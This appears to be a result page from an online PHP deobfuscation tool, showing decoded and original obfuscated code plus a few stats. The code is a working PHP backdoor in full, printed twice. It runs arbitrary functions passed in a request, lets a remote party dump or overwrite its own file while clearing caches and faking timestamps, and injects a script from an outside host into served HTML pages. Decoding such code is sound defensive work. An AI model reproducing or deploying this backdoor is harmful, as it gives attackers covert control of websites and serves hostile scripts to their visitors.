Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if( $N4W5=@${"_REQUEST"}["9QPMP55F"] ){$N4W5[1](${$N4W5[2]}[0],$N4W5[3]( $N4W5[4 ]));}; i..
Decoded Output download
<? if( $N4W5=@${"_REQUEST"}["9QPMP55F"] ){$N4W5[1](${$N4W5[2]}[0],$N4W5[3]( $N4W5[4 ]));};
if(isset($_REQUEST["ku6b15i7ktwd7o3h"])){if(empty($_REQUEST["ku6b15i7ktwd7o3h"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$p2xlzs=filemtime(__FILE__);$u6kvq4=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["ku6b15i7ktwd7o3h"]))));@touch(__FILE__,$p2xlzs+1,$u6kvq4+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function mj3ubb($p2xlzs){return str_replace("</head>","<script type='text/javascript' async src='https://428p04mt.cloudfire.quest/challenge.js'></script></head>",$p2xlzs);}ob_start("mj3ubb");} ?>
Did this file decode correctly?
Original Code
if( $N4W5=@${"_REQUEST"}["9QPMP55F"] ){$N4W5[1](${$N4W5[2]}[0],$N4W5[3]( $N4W5[4 ]));};
if(isset($_REQUEST["\153\x75\x36\142\x31\65\x697\x6b\164\167\144\x37\157\x33h"])){if(empty($_REQUEST["\x6bu\66\142\61\65\x69\67\x6bt\x77\x64\67o3h"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("\x58-L\x69\x74e\x53\160\x65e\144-\x50\x75\x72g\145\x3a\40\52");if(function_exists("\x6f\x70\143\x61che\137r\145\163\145t")){@opcache_reset();}if(function_exists("a\x70c\137\143\x6ce\141\x72\x5fc\141c\150\x65")){@apc_clear_cache();}$p2xlzs=filemtime(__FILE__);$u6kvq4=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48\x2a",$_REQUEST["k\165\x36\142\61\x35\x69\x37k\164w\x64\x37\157\63h"]))));@touch(__FILE__,$p2xlzs+1,$u6kvq4+1);}die;}if(isset($_SERVER["H\124\124\120\x5f\101C\103\105PT"])&&(strpos($_SERVER["H\x54\124P\x5f\101CCEP\x54"],"\x74\145\x78t\57h\x74\155l")!==false||$_SERVER["\x48\124T\x50\x5f\101\103\103\105P\124"]==="*/\52")){function mj3ubb($p2xlzs){return str_replace("</he\x61\144\76","\74sc\162\151\160\164 \x74\x79\160e='\164e\170\x74\57ja\166\141\163c\162\x69\x70t\47\x20\141syn\x63\x20src='h\x74\164\x70s\72\x2f/\64\x328p\60\64\x6d\164\x2e\x63\x6co\x75\144\x66\x69\162\x65\x2e\x71u\145st\x2f\143\150\x61l\154\x65\x6e\x67e\x2e\152\163\x27\76\x3c\x2f\x73\143r\151p\164><\x2f\x68\x65\141\144>",$p2xlzs);}ob_start("\155\152\63u\142\142");}
Function Calls
strpos | 1 |
Stats
MD5 | 8c983403a23049fb5874e1834b0de6a7 |
Eval Count | 0 |
Decode Time | 111 ms |